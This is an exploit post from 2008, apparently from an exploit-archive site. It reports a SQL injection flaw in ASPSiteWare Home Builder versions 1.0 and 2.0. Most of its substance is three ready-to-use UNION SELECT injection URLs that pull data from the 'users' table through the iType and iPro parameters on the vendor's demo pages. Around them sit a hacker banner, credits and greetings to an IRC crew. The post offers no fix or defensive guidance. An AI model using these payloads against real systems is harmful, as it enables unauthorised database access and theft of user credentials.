ASPSiteWare Home Builder 1.0-2.0 SQL Injection Vulnerability

2008-12-14 06:00:07

############################################################################-------------------------------AlpHaNiX----------------------------------#############################################################################Found By : AlpHaNiX#website : www.offensivetrack.org#contact : AlpHa[AT]HACKER[DOT]BZ############################################################################script : Home Builder V1.0 / V2.0#download : null#Demo : http://www.aspsiteware.com/Home1/ http://www.aspsiteware.com/home2/home2/############################################################################Exploits :--=[SQL INJECTION]=--http://www.aspsiteware.com/Home1/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+usershttp://www.aspsiteware.com/home2/home2/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+usershttp://www.aspsiteware.com/home2/home2/type2.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#Greetz For CrimeIRC NetWork [ IRC.CrimeIRC.Net ] Syst3m UnkOwn and all Staff############################################################################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.